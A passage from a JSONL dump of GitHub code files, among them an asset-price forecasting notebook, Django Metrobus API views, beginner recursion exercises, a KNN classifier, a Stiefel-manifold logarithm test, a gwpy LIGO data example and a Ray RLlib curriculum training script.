\n        results = readFile('MLP', dataset , str(variable), [32])\n\n        # Replace the predictions in the dataframe with the amalgamated predictions\n        results.Pred = pred\n        \n        if(variable != 'ALL'):\n            # Edge case for PCA dataset with different naming convention.\n            \n            resultsDF = analyzeResults(results, resultsDF, 'Amalgamation', dataset + ': ' + str(variable))\n        else: \n            resultsDF = analyzeResults(results, resultsDF, 'Amalgamation', str(variable))\n        \n    return resultsDF\n\n\n\n# ### Amalgamation per variable MEV\n\n# +\n# Variables setup: \nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='MEV Variables', engine='openpyxl', index_col=0)\narchitectures = ['CNN', 'MLP', 'FNN']\ndataset = 'MEV'\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, dataset)\n\n# Get results based on amalgamation\nresultsMEV = getAmalgamationResults(results, aggregatedDict, dataset = 'MEV')\nresultsMEV\n# -\n\n# ### Amalgamation per variable TA\n\n# +\n# Variables setup: \nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='TA Variables', engine='openpyxl', index_col=0)\narchitectures = ['CNN', 'MLP', 'FNN']\ndataset = 'TA'\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, dataset)\n\n# Get results based on amalgamation\nresultsTA = getAmalgamationResults(results, aggregatedDict, dataset = 'TA')\nresultsTA\n# -\n\n# ### Amalgamation for ALL model (MEV + TA)\n\n# +\n# Variables setup: \nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy All', engine='openpyxl', index_col=0)\narchitectures = ['CNN', 'MLP', 'FNN']\ndataset = 'ALL'\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, dataset)\n\n# Get results based on amalgamation\nresultsALL = getAmalgamationResults(results, aggregatedDict, dataset = 'ALL')\nresultsALL\n# -\n\n# ### Amalgamation for PCA model (MEV, TA, MEV + TA)\n\n# +\nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy PCA', engine='openpyxl', index_col=0)\nresults = results[results.Dataset == 'MEV']\narchitectures = ['CNN', 'MLP', 'FNN']\n\n# Get amalgamated predictions\naggregatedDict = amalgamateResults(results, architectures, 'MEV', PCA = True)\n\n# Get results based on amalgamation\nresultsPCA = getAmalgamationResults(results, aggregatedDict, dataset = 'MEV', PCA = True)\n\n# Redo analysis for TA only PCA models\nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy PCA', engine='openpyxl', index_col=0)\nresults = results[results.Dataset == 'TA']\naggregatedDict = amalgamateResults(results, architectures, 'TA', PCA = True)\nresultsPCA = resultsPCA.append(getAmalgamationResults(results, aggregatedDict, dataset = 'TA', PCA = True))\n\n# Redo analysis for TA+MEV PCA models\nresults = pd.read_excel(open('output/ALL.xlsx', 'rb'), sheet_name='Accuracy PCA', engine='openpyxl', index_col=0)\nresults = results[results.Dataset == 'ALL']\naggregatedDict = amalgamateResults(results, architectures, 'ALL', PCA = True)\nresultsPCA = resultsPCA.append(getAmalgamationResults(results, aggregatedDict, dataset = 'ALL', PCA = True))\n\nresultsPCA\n# -\n\n\n\n\n","repo_name":"lex-koelewijn/Thesis_Asset_Price_Forecasting","sub_path":"Amalgamation.py","file_name":"Amalgamation.py","file_ext":"py","file_size_in_byte":9099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"5494298747","text":"from django.conf import settings\nfrom 
rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom api.serializer import (\n    DistrictUnitsMetrobusSerializer,\n    TokenDistrictUnitsMetrobusSerializer,\n    UnitMetrobusSerializer,\n    UnitUbicationMetrobusSerializer,\n)\n\n# Create your views here.\n\n\nclass UnitsMetrobusViewSet(GenericViewSet):\n\n    queryset = []\n    site_api_cdmx = \"https://datos.cdmx.gob.mx/api/3/action/datastore_search\"\n    api_cdmx = site_api_cdmx + \"?resource_id=ad360a0e-b42f-482c-af12-1fd72140032e\"\n\n    \"\"\"This view shows all the units; it is an intermediate URL to the consumed API\"\"\"\n\n    def list(self, *args, **kwargs):\n        params = self.request.query_params\n        limit_query = \"11\" if \"limit\" not in params else params[\"limit\"]\n        query_offset = \"\" if \"offset\" not in params else \"&offset=\" + params[\"offset\"]\n\n        url = self.api_cdmx + \"&limit=\" + limit_query + query_offset\n        serializer = UnitMetrobusSerializer({\"url\": url})\n        return Response(serializer.data[\"results\"])\n\n    \"\"\"This view shows one unit and its location\"\"\"\n\n    def retrieve(self, request, *args, **kwargs):\n        id_unit = kwargs[\"pk\"]\n        serializer = UnitUbicationMetrobusSerializer({\"id\": id_unit})\n        return Response(serializer.data[\"unit\"])\n\n\nclass DistrictsViewSet(GenericViewSet):\n\n    queryset = []\n\n    \"\"\"This is the view to return the districts (alcaldias)\"\"\"\n\n    def list(self, *args, **kwargs):\n        return Response(settings.DISTRICTS)\n\n    \"\"\"\n    This view sends a task to update the db and\n    returns a couple of URLs which have the respective\n    queries to get the units for a district.\n    \"\"\"\n\n    def retrieve(self, request, *args, **kwargs):\n\n        district = kwargs[\"pk\"]\n\n        serializer = DistrictUnitsMetrobusSerializer(data={\"district\": district})\n\n        serializer.is_valid(raise_exception=True)\n\n        data = serializer.save()\n\n        return Response(data)\n\n    \"\"\"\n    This view shows the units for a district (alcaldia)\n    and the state of the task which is getting the units for the current district\n    \"\"\"\n\n    @action(\n        methods=[\n            \"GET\",\n        ],\n        detail=True,\n        url_name=\"units\",\n        url_path=\"units\",\n    )\n    def get_units(self, request, *args, **kwargs):\n        district = kwargs[\"pk\"]\n        token = request.query_params.get(\"token\", \"\")\n        data = {\"token\": token, \"district\": district}\n        serializer = TokenDistrictUnitsMetrobusSerializer(data=data)\n        serializer.is_valid(raise_exception=True)\n        data = serializer.save()\n        return Response(data)\n","repo_name":"xd860xd/transpot_cdmx","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15344661882","text":"# 7. 
Given a string, compute recursively (no loops) a new string where all the\n# lowercase 'x' chars have been changed to 'y' chars.\n\ndef change(characters):\n\n    if len(characters) == 0:\n        return ''\n\n    elif characters[0] == 'x':\n        return 'y' + change(characters[1:])\n\n    else:\n        return characters[0] + change(characters[1:])\n\nprint(change('xxxdxxxdxxxgxxxxhxx'))\n","repo_name":"greenfox-zerda-lasers/bereczb","sub_path":"week-04/day-4/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10331559055","text":"from data_utils import shared_utils\nfrom eval_utils import eval_shared_modules\nfrom transformers import AutoTokenizer\n\nclass BaseConfig(object):\n    def __init__(self, args):\n        self.epochs = args.epoch\n        self.batch_size = args.batch\n        self.device = args.device\n        self.fold = args.fold\n\n        self.input_size = args.input_size\n        self.hidden_size = args.hidden_size\n        self.num_layers = args.num_layers\n\n        self.model_mode = args.model_mode\n        self.model_type = args.model_type\n        self.file_type = args.file_type\n        self.stage_model = args.stage_model\n        self.program_mode = args.program_mode\n        self.position_sys = args.position_sys\n\n        self.path = PathConfig(self.device, self.program_mode)\n        self.val = GlobalConfig(self.position_sys)\n\n        if \"bert\" in self.model_mode:\n            self.bert_tokenizer = AutoTokenizer.from_pretrained(self.model_mode)\n    \n    \nclass PathConfig(object):\n    def __init__(self, file_type, program_mode):\n        self.standard_path = {\n            \"train\": \"../data/train.txt\",\n            \"test\": \"../data/test.txt\",\n            \"dev\": \"../data/dev.txt\"\n        }\n\n        self.bert_model_path = \"bert-base-multilingual-cased\"\n        self.pre_process_path = \"../data/preprocess/\"\n        self.pre_process_data = {\n            \"train\": \"../data/preprocess/train_data.pkl\",\n            \"dev\": \"../data/preprocess/dev_data.pkl\",\n            \"test\": \"../data/preprocess/test_data.pkl\"\n        }\n\nclass GlobalConfig(object):\n    def __init__(self, position_sys):\n        self.elem_col = ['subject', 'object', 'aspect', 'result']\n        self.polarity_col = ['None', 'COM', 'COM+', 'COM-', 'SUP', 'SUP+', 'SUP-', 'EQL', 'DIF']\n        # self.polarity_dict = {k: index for index, k in enumerate(self.polarity_col)}\n        self.polarity_dict = {k: index -1 for index, k in enumerate(self.polarity_col)}\n        # self.polarity_dict ={\n        #     \"COM\": 1,\n        #     \"COM-\":-1,\n        #     \"COM+\": 2,\n        #     \"SUP\": 3,\n        #     \"SUP-\":-2,\n        #     \"SUP+\": 4, \n        #     \"DIF\":-3,\n        #     \"EQL\": 0\n        # }\n        if position_sys == 'SPAN':  # include (s_index, e_index)\n            self.position_sys = []\n        else: \n            self.position_sys = list(position_sys)  # BIEOS = [B, I, E, O, S]\n        \n        self.special_id_map, self.norm_id_map = {\"O\": 0}, {\"O\": 0}\n\n        # other flag is \"O\"\n        # Create a dictionary mapping each pos_sys element to its numeric id (as key-value pairs)\n        # {'O': 0, 'B': 1, 'M': 2, 'E': 3, 'S': 4}\n        self.norm_id_map = eval_shared_modules.create_tag_mapping_ids([], self.position_sys, other_flag=True)\n        # {'O': 0, 'B-entity_1': 1, 'M-entity_1': 2, 'E-entity_1': 3, 'S-entity_1': 4, 'B-entity_2': 5, 'M-entity_2': 6, so on ...}\n        self.special_id_map = eval_shared_modules.create_tag_mapping_ids(self.polarity_col, self.position_sys, other_flag=True)\n\n        # Invert the dictionaries above: value -> key\n        self.invert_special_id_map = {v: k for k, v in self.special_id_map.items()}\n        self.invert_norm_id_map = {v: k for k, v in 
self.norm_id_map.items()}\n\n","repo_name":"haiyen040602/VLSP2023","sub_path":"coqe_base/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30272211548","text":"import yaml\nfrom copy import deepcopy\nimport uuid\ndoc = yaml.load(open(\"updates.yaml\").read(),Loader=yaml.Loader)\n\ndeets = doc[\"detailed_collection\"]\ntemplate = doc[\"detailed_collection\"][0]\n\ndef addUpdates(deet):\n print()\n [name,info] = deet\n line = input(f\"updates for {name}, enter 'no' if not: \").strip()\n new_updates = []\n if line == \"no\" or line == \"\":\n info[\"newUpdates\"] = False\n else:\n info[\"newUpdates\"] = True\n while not line == \"done\" and not line == \"\":\n new_updates.append(line)\n line = input(f\"updates for {name} write 'done' or '' to stop: \").strip()\n print(\"adding\",new_updates,\" to info\")\n info[\"updates\"].insert(0,new_updates)\n\nfor element in deets[1:]:\n [name,info] = element\n if info[\"status\"] == \"active\" :\n print(name)\n print(\"active project\")\n addUpdates(element)\n\n## adding new projects section\n# new_proj = input(\"add new project by name? \").strip()\n# while not new_proj == \"no\" and not new_proj == '':\n# new_proj_obj = deepcopy(template)\n# print(new_proj_obj)\n# new_proj_obj[0] = new_proj\n# print(new_proj_obj)\n# new_proj_obj[1][\"type\"] = input(\"collaboration/consult/infrastructure? \").strip()\n# ## get rid of None update\n# addUpdates(new_proj_obj)\n# ## insert it into the doc\n# deets.insert(1,new_proj_obj)\n# new_proj = input(\"add new project by name? \").strip()\n\n\n\n##write out the result\nwith open(f\"test.yml{uuid.uuid1()}\",\"w\") as phile:\n phile.write(yaml.dump(doc,default_flow_style= False))\n\n\n\n","repo_name":"DevinBayly/weekly_reports","sub_path":"interactive_fillout.py","file_name":"interactive_fillout.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70505743123","text":"from __future__ import print_function\nfrom collections import Counter\nimport string\nimport re\nimport argparse\nimport json\nimport datasets\nimport numpy as np\nfrom typing import List, Dict\nrouge_metric = datasets.load_metric('rouge')\ndef rouge(prediction, ground_truth):\n score = rouge_metric.compute(\n predictions=[prediction],\n references=[ground_truth],\n **{'use_agregator': False, 'use_stemmer': True, 'rouge_types': ['rougeL']}\n )\n return score['rougeL'][0].fmeasure\ndef metric_max_over_ground_truths(metric_fn, prediction, ground_truths):\n scores_for_ground_truths = []\n for ground_truth in ground_truths:\n score = metric_fn(prediction, ground_truth)\n scores_for_ground_truths.append(score)\n return max(scores_for_ground_truths)\ndef evaluate(dataset, predictions):\n metrics = {}\n for i in range(len(predictions)):\n pred=predictions[i]['output']\n gold_input=dataset['Instances'][predictions[i]['index']]['input']\n gold_outputs=dataset['Instances'][predictions[i]['index']]['output']\n if 'rouge' not in metrics:\n metrics['rouge']= 0\n metrics['rouge'] += metric_max_over_ground_truths(rouge, pred, gold_outputs)\n\n for key in metrics.keys():\n metrics[key] /= len(predictions)\n\n return metrics\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--dataset\",\n type=str,\n required=True,\n help=\"Dataset Json File Name\")\n parser.add_argument(\"--predictions\",\n type=str,\n 
required=True,\n help=\"Prediction File Name\")\n args = parser.parse_args()\n with open(args.dataset) as dataset_file:\n dataset_json = json.load(dataset_file)\n with open(args.predictions) as prediction_file:\n predictions_json = json.load(prediction_file)\n print(evaluate(dataset_json,predictions_json['predictions']))\nif __name__ == \"__main__\":\n main()","repo_name":"allenai/natural-instructions-v1","sub_path":"src/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"25554629426","text":"#! usr/bin/python\n\n# 1688. Count of Matches in Tournament\n\ndef count(n: int, r: int = 0) -> int:\n if n == 2:\n return r + 1\n if n & 1 != 1:\n return count(n//2, r + n//2)\n else:\n return count((n - 1)//2 + 1, r + (n - 1)//2)\n\n\nclass Solution:\n def numberOfMatches(self, n: int) -> int:\n if n < 2:\n return 0\n return count(n)\n\n\nif __name__ == '__main__':\n # case 1\n # n = 7\n # case 2\n n = 14\n\n solution = Solution()\n answer = solution.numberOfMatches(n)\n print(answer)\n","repo_name":"beskrovniibv/leetcode","sub_path":"1688/1688.1.py","file_name":"1688.1.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27105446632","text":"import numpy as np\n\n# Normalize ranges\ndef normalize_distances(train):\n scalars = []\n train_n = np.copy(train)\n for i in range(1, len(train[0])):\n feature_max = np.amax(train[:,i])\n for j in range(0, len(train[:,i])):\n train_n[j][i] = train[j][i] / feature_max\n scalars.append(feature_max)\n return (train_n, scalars)\n\n# Define distance function\ndef calculate_distance(a, b):#only features passed in here\n total = 0\n for i in range(0, len(a)):\n total += (a[i] - b[i])*(a[i] - b[i])\n return total**0.5\n\n# Get distances of all training data to test data\ndef get_distances(train_n, one_test_vector):\n distances = []\n for i in range(0, len(train_n)):\n single_distance = [calculate_distance(train_n[i][1:], one_test_vector)]\n single_distance.append(train_n[i][0])\n distances.append(single_distance)\n return distances\n\n# Currently takes one test sample, assumes the first column as label\nclass KNN(object):\n def __init__(self, train):\n (self.train_n, self.scalars) = normalize_distances(train)\n\n def predict(self, input_vector, k):\n self.scaled_input = np.empty(len(input_vector)-1)\n for i in range(0, len(self.scalars)):\n self.scaled_input[i] = input_vector[i+1] / self.scalars[i]\n self.unsorted_distances = get_distances(self.train_n, self.scaled_input)\n # Top K nearest distances with predictions\n self.sorted_distances = sorted(self.unsorted_distances, key=lambda tup: tup[0])[0:k]\n # Alternative quick mode, specific to labels -1 and 1 (stats.mode would operate better on differently structured arrays)\n my_sum = 0\n for j in range(0, k):\n my_sum += self.sorted_distances[j][1]\n if(my_sum >= 0):\n self.prediction = 1\n elif(my_sum < 0):\n self.prediction = -1\n return self.prediction","repo_name":"markuswoltjer/CS434","sub_path":"HW3/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7120089104","text":"\nfrom types import NoneType\nfrom Listas_Encadeadas import*\nfrom Conversor_Posfixo import*\n\ndef faz_operacao(op,x,y):\n if op == \"+\":\n return x+y\n elif op == \"-\":\n 
return x-y\n    elif op==\"*\":\n        return x*y\n    elif op==\"/\":\n        return x/y\n    else:\n        return False\n\ndef avaliarPosfixa(expressao):\n    pilha=Lista_encadeada()\n    for i in range(len(expressao)):\n        unidade=expressao[i]\n        if unidade >=\"0\" and unidade<=\"9\":\n            pilha.adicionar_lista(unidade)\n        else:\n            try:\n                x=int(pilha.desempilhar())\n                y=int(pilha.desempilhar())\n            except AttributeError:\n                print(\"Extra operator in the expression\")\n                exit()  \n            valor=faz_operacao(unidade,x,y)\n\n            if valor:\n                pilha.adicionar_lista(valor)\n            else:\n                return \"Operator not registered or invalid\"\n    resultado=pilha.desempilhar()\n    if pilha.eVazio():\n        return resultado\n    else:\n        return \"Invalid expression\"\n\n","repo_name":"Itossai/Projetos_Estrutura","sub_path":"Projeto 1/Verificador.py","file_name":"Verificador.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22025747470","text":"def resposta(r):\n    if r == 'variable':\n        return ':)' * 100\n    \n\n\ndef main():\n    r = input('In Python, what do you call a \"box\" used to store data? ')\n    \n    r1 = resposta(r)\n    \n    print(f'{r1}')\n\n    print('Thanks for playing!')\n\nif __name__ == '__main__':\n    main()\n    \n","repo_name":"josevitor32/atividades-pec","sub_path":"Atividade01-sem07-/passo 01.py","file_name":"passo 01.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6831115850","text":"#------------------------------------------------------------------------------\n#\n# Basic test for Stiefel log:\n#\n# Compute the average iteration count for the Stiefel Log for\n# input data that are a preselected Riemannian distance apart.\n#\n#\n# This script is an illustrative example for \n# solving the local geodesic endpoint problem\n# = computing the Riemannian logarithm on the Stiefel manifold.\n#\n# The algorithms work for a one-parameter family of metrics, including the \n# Euclidean and the canonical metric.\n# The canonical metric allows for special algorithmic treatment.\n# For all other metrics, a tailored shooting method is invoked.\n#\n# For theoretical background and description of the algorithms, see\n#\n# R. Zimmermann, K. 
H\\\"uper.\n# \"Computing the Riemannian logarithm on the Stiefel manifold: \n# metrics, methods and performance\", arXiv:2103.12046, March 2022\n#\n# If you make use of these methods, please cite the aforementioned reference.\n#\n#\n# @author: Ralf Zimmermann, IMADA, SDU Odense\n#------------------------------------------------------------------------------\n\nimport scipy\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\n# local module\nimport Stiefel_Exp_Log as StEL\n\nprint('Running script_Stiefel_Log_basic_test.py')\n\n# *** BEGIN: USER PARAMETERS ***\n# set dimensions\nn = 100\np = 40\n# choose metric parameter: alpha = -0.5: Euclidean, alpha = 0.0: canonical\nalpha = -0.0\n# numerical convergence threshold\ntau = 1.0e-12\n# set number of random experiments\nruns = 10\n# set distance of Stiefel points\ndist = 0.7*scipy.pi\n# plot convergence history of last run?\ndo_plot = True\n# *** END: USER PARAMETERS ***\n\n\n# initialize iteration counter\naverage_iters = 0.0\n# initialize accuracy indicator\naverage_acc = 0.0\nfor j in range(runs):\n #create random Stiefel data\n U0, U1, Delta = StEL.create_random_Stiefel_data(n, p, dist, alpha)\n \n # compute the Stiefel logarithm\n Delta_rec, conv_hist = StEL.Stiefel_Log(U0, U1, tau, alpha); \n # check, if Stiefel logarithm recovers Delta\n num_acc = linalg.norm(Delta_rec - Delta, 'fro')/linalg.norm(Delta, 'fro')\n print('recovery up to:', num_acc)\n average_iters = average_iters + len(conv_hist)\n average_acc = average_acc + num_acc\n#end for...\n \naverage_iters = average_iters/runs\naverage_acc = average_acc/runs\nprint('The average iteration count of the Stiefel log is ', average_iters)\nprint('The average relative accuracy of the Stiefel log is ', average_acc)\n\nif do_plot:\n #plot the convergence history of the last run:\n # create plot object \n fig, ax1 = plt.subplots()\n \n # plot convergence history\n ax1.semilogy(range(len(conv_hist)), conv_hist, 'ko-')\n ax1.set_title(\"Convergence history (last run)\")\n \n plt.xlabel(\"iterations\")\n plt.ylabel(\"error\")\n \n # execute the plot\n plt.show()","repo_name":"RalfZimmermannSDU/RiemannStiefelLog","sub_path":"Stiefel_log_general_metric/SciPy/script_Stiefel_Log_basic_test.py","file_name":"script_Stiefel_Log_basic_test.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"13041545753","text":"__author__ = \"Duncan Macleod \"\n__currentmodule__ = \"gwpy.timeseries\"\n\n# Firstly, we can use the |gwosc-mod| Python package to query for the\n# time of the first gravitational-wave detection |GW150914|:\n\nfrom gwosc.datasets import event_gps\ngps = event_gps(\"GW150914\")\n\n# GWpy's `TimeSeries` class provides an interface to the public |GWOSC|\n# data in the :meth:`~TimeSeries.fetch_open_data` method; to use it we\n# need to first import the `TimeSeries` object:\n\nfrom gwpy.timeseries import TimeSeries\n\n# then call the :meth:`~TimeSeries.fetch_open_data` method, passing it the\n# prefix for the interferometer we want (`'L1'` here for LIGO-Livingston),\n# and the GPS start and stop times of our query (based around the GPS time\n# for GW150914):\n\ndata = TimeSeries.fetch_open_data('L1', gps-5, gps+5)\n\n# and then we can make a plot:\n\nplot = data.plot(\n title=\"LIGO Livingston Observatory data for GW150914\",\n ylabel=\"Strain amplitude\",\n color=\"gwpy:ligo-livingston\",\n epoch=gps,\n)\nplot.show()\n\n# We can't see anything that looks like a gravitational wave signal 
in these\n# data, the amplitude is dominated by low-frequency detector noise.\n# Further filtering is required to be able to identify the GW150914 event\n# here, see :ref:`gwpy-example-signal-gw150914` for a more in-depth example of\n# extracting signals from noise.\n","repo_name":"gwpy/gwpy","sub_path":"examples/timeseries/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"3"} +{"seq_id":"17854948364","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 8 11:50:18 2021\n\n@author: sound\n\"\"\"\n##Library for loading data\nimport m24\n##Basic libraries for plotting and working with arrays\nimport matplotlib.pyplot as plt\nimport numpy as np\n######Custom functions\nimport m24_functions as fn\n######Library for managing files\nimport os\n########################### Excess Kurtosis and Skewness\nfrom scipy.stats import kurtosis\nfrom scipy.stats import skew\n##\nimport glob\n#\n\n#####################################\n#creating plots\nactual=\"D:/m24_load_javier\"\ns_areas=['S1','S2','MPC-left','MPC-right','VPC','M1','DPC']\ncondiciones=['c1','c2','c3','c4']\nfor c in condiciones:\n for a in s_areas:\n moments=['MEAN','STD','KUR','SK']\n mom={'KUR':'Excess Kurtosis','STD':'Standard Deviation','MEAN':'Mean','SK':'Skewness'}\n ################\n for m in moments:\n directory=actual+f\"/Data/{a}_Conditions_Dist/{c}/{m}\"\n \n x=fn.getFilelist(directory,prefixo=f'{m}_exp*.npy')\n print(x)\n nx=len(x)\n \n data_wait=[]\n data_delay1=[]\n data_delay2=[]\n \n for i in range(nx):\n exp=np.load(x[i])\n data_wait.append(exp[0])\n data_delay1.append(exp[1])\n data_delay2.append(exp[2])\n \n data_wait=np.concatenate(data_wait)\n data_delay1=np.concatenate(data_delay1)\n data_delay2=np.concatenate(data_delay2)\n ############################################\n directory=actual+f\"/plots/Allinone/{a}_conditions_Allexp/{c}/{m}\"\n print(directory)\n try:\n os.makedirs(directory)\n except OSError:\n print(\"The directory creation %s fail\" % directory)\n else:\n print(\"The directory has been created: %s \" % directory)\n \n fig = plt.figure(figsize=(11,6))\n ax=fig.add_subplot(1,1,1)\n samples=(data_wait,data_delay1,data_delay2)\n dists,bins=fn.getSamplesDistributions(samples)\n dist1,dist2,dist3=dists\n #ax.set_yscale('log')\n ax.plot(bins[1:],dist1, label='Wait',color='blue',alpha=0.7)\n ax.plot(bins[1:],dist2,label='Delay 1',color='red',alpha=0.7)\n ax.plot(bins[1:],dist3,label='Delay 2',color='green',alpha=0.7)\n ax.set_title(f'Probability distribution of {mom[m]} in {a}\\n during All epochs\\n All exp \\n condition{c}')\n ax.legend()\n ax.set_xlabel('units')\n ax.set_ylabel('Probability')\n fsave=(f\"D:/m24_load_javier/plots/Allinone/{a}_conditions_Allexp/{c}/{m}/{c}_{m}_{a}_conditions_ALlepochs.svg\")\n fig.savefig(fsave)\n print(fsave)\n plt.close('all')\n \n \n","repo_name":"soundingreen/professional-internship-historical","sub_path":"m24_load_javier_vFINAL/plot_All_Moments_Dists_All_Areas_conditions_by_All_epochs_in_one.py","file_name":"plot_All_Moments_Dists_All_Areas_conditions_by_All_epochs_in_one.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71397624081","text":"import yaml\n\nimport ray\nfrom ray import tune\nfrom ray.rllib.agents.callbacks import DefaultCallbacks\nfrom soccer_twos import EnvType\n\nfrom utils import create_rllib_env, sample_pos_vel, 
sample_player\n\n\nNUM_ENVS_PER_WORKER = 3\n\ncurrent = 0\nwith open(\"curriculum.yaml\") as f:\n curriculum = yaml.load(f, Loader=yaml.FullLoader)\ntasks = curriculum[\"tasks\"]\nconfig_fns = {\n \"none\": lambda *_: None,\n \"random_players\": lambda env: env.set_policies(\n lambda *_: env.action_space.sample()\n ),\n}\n\n\nclass CurriculumUpdateCallback(DefaultCallbacks):\n def on_episode_start(\n self, *, worker, base_env, policies, episode, env_index, **kwargs\n ) -> None:\n global current, tasks\n\n for env in base_env.get_unwrapped():\n config_fns[tasks[current][\"config_fn\"]](env)\n env.env_channel.set_parameters(\n ball_state=sample_pos_vel(tasks[current][\"ranges\"][\"ball\"]),\n players_states={\n player: sample_player(tasks[current][\"ranges\"][\"players\"][player])\n for player in tasks[current][\"ranges\"][\"players\"]\n },\n )\n\n def on_train_result(self, **info):\n global current\n if info[\"result\"][\"episode_reward_mean\"] > 1.5:\n if current < len(tasks) - 1:\n print(\"---- Updating tasks!!! ----\")\n current += 1\n print(f\"Current task: {current} - {tasks[current]['name']}\")\n\n\nif __name__ == \"__main__\":\n ray.init()\n\n tune.registry.register_env(\"Soccer\", create_rllib_env)\n temp_env = create_rllib_env()\n obs_space = temp_env.observation_space\n act_space = temp_env.action_space\n temp_env.close()\n\n analysis = tune.run(\n \"PPO\",\n name=\"PPO_curriculum\",\n config={\n # system settings\n \"num_gpus\": 1,\n \"num_workers\": 14,\n \"num_envs_per_worker\": NUM_ENVS_PER_WORKER,\n \"log_level\": \"INFO\",\n \"framework\": \"torch\",\n \"callbacks\": CurriculumUpdateCallback,\n # RL setup\n \"env\": \"Soccer\",\n \"env_config\": {\n \"num_envs_per_worker\": NUM_ENVS_PER_WORKER,\n \"variation\": EnvType.team_vs_policy,\n \"multiagent\": False,\n \"flatten_branched\": True,\n \"single_player\": True,\n \"opponent_policy\": lambda *_: 0,\n },\n \"model\": {\n \"vf_share_layers\": True,\n \"fcnet_hiddens\": [256, 256],\n \"fcnet_activation\": \"relu\",\n },\n \"rollout_fragment_length\": 5000,\n \"batch_mode\": \"complete_episodes\",\n },\n stop={\n \"timesteps_total\": 15000000,\n \"time_total_s\": 7200, # 2h\n \"episode_reward_mean\": 1.9,\n },\n checkpoint_freq=5,\n checkpoint_at_end=True,\n local_dir=\"./ray_results\",\n # restore=\"./ray_results/PPO_selfplay_twos_2/PPO_Soccer_a8b44_00000_0_2021-09-18_11-13-55/checkpoint_000600/checkpoint-600\",\n )\n\n # Gets best trial based on max accuracy across all training iterations.\n best_trial = analysis.get_best_trial(\"episode_reward_mean\", mode=\"max\")\n print(best_trial)\n # Gets best checkpoint for trial based on accuracy.\n best_checkpoint = analysis.get_best_checkpoint(\n trial=best_trial, metric=\"episode_reward_mean\", mode=\"max\"\n )\n print(best_checkpoint)\n print(\"Done training\")\n","repo_name":"bryanoliveira/soccer-twos-starter","sub_path":"train_ray_curriculum.py","file_name":"train_ray_curriculum.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22510762535","text":"#!/usr/bin/python3.6\n#this script creates traninig data to create an ANN which classifies behavior\n#this is done by creating images of cropped out mice and annotating it depending on the behavior which is displayed\n#0 exploring\n#1 grooming\n#2 rearing\n#3 keep down\n#3 close following\n#4 sniffing\n\n\n#torch libaries\nfrom torchvision import transforms,datasets\nimport torch, torchvision, torch.optim as optim, torch.nn as 
nn, torch.nn.functional as F\n#general libaries\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt, cv2\nimport numpy as np, sys, os, cv2, random, math, time\n#own libaries\nimport net_handler as nh, data_manipulater as dm, image_analyser as ia\n\nprint('Is cuda available:\\t'+ str(torch.cuda.is_available()))\nprint('Available devices:\\t'+str(torch.cuda.device_count()))\nprint('Device 0 name:\\t'+ torch.cuda.get_device_name(0))\ntorch.cuda.set_device(0)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint('Using device:\\t'+ str(device))\nif device.type == 'cuda':\n print('Memory Usage:')\n print('\\tAllocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')\n print('\\tCached: ', round(torch.cuda.memory_cached(0)/1024**3,1), 'GB')\n\n#used to proper dislpay an image with opencv\ndef lucidDreaming(wait=True):\n while 1:\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n print('keyboard interuption: its getting dark')\n return True\n if k == 32:\n return False\n if not wait:\n return False\n\n#calculates the distance between two points\ndef get_distance(p1,p2):\n return round(math.sqrt((p1[0]-p2[0])**2+(p1[1]-p2[1])**2),2)\n\n#reutrn the contour of the biggest object in a binary image\ndef 